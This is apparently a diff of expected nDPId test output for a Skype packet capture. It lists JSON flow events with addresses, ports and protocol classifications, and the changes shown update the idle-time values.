-00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970651380,"flow_last_seen":1431970679567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":441,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970651380,"flow_last_seen":1431970679567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":441,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970651380,"flow_last_seen":1431970679567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":441,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970651380,"flow_last_seen":1431970679567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":441,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634648,"flow_last_seen":1431970634648,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61016,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970659480,"flow_last_seen":1431970693361,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970659480,"flow_last_seen":1431970693361,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970668514,"flow_last_seen":1431970696319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970668514,"flow_last_seen":1431970696319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970673563,"flow_last_seen":1431970703649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970673563,"flow_last_seen":1431970703649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970684583,"flow_last_seen":1431970684880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970684583,"flow_last_seen":1431970684880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970659480,"flow_last_seen":1431970693361,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970659480,"flow_last_seen":1431970693361,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970668514,"flow_last_seen":1431970696319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970668514,"flow_last_seen":1431970696319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970673563,"flow_last_seen":1431970703649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970673563,"flow_last_seen":1431970703649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970684583,"flow_last_seen":1431970684880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970684583,"flow_last_seen":1431970684880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970670304,"flow_last_seen":1431970696803,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431970687262,"flow_last_seen":1431970707409,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"83.31.12.173","src_port":13021,"dst_port":23939,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -986,75 +986,75 @@ 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634729,"flow_last_seen":1431970661287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970687670,"flow_last_seen":1431970706351,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970687670,"flow_last_seen":1431970706351,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970635489,"flow_last_seen":1431970690062,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":2405,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1431970688781,"flow_last_seen":1431970693454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51292,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1431970688781,"flow_last_seen":1431970693454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51292,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970687670,"flow_last_seen":1431970706351,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970687670,"flow_last_seen":1431970706351,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970635489,"flow_last_seen":1431970690062,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":2405,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1431970688781,"flow_last_seen":1431970693454,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51292,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1431970688781,"flow_last_seen":1431970693454,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51292,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634276,"flow_last_seen":1431970660781,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55028,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431970690191,"flow_last_seen":1431970705014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":1336,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431970690191,"flow_last_seen":1431970705014,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":1336,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970636044,"flow_last_seen":1431970646741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686843,"flow_last_seen":1431970687201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686843,"flow_last_seen":1431970687201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
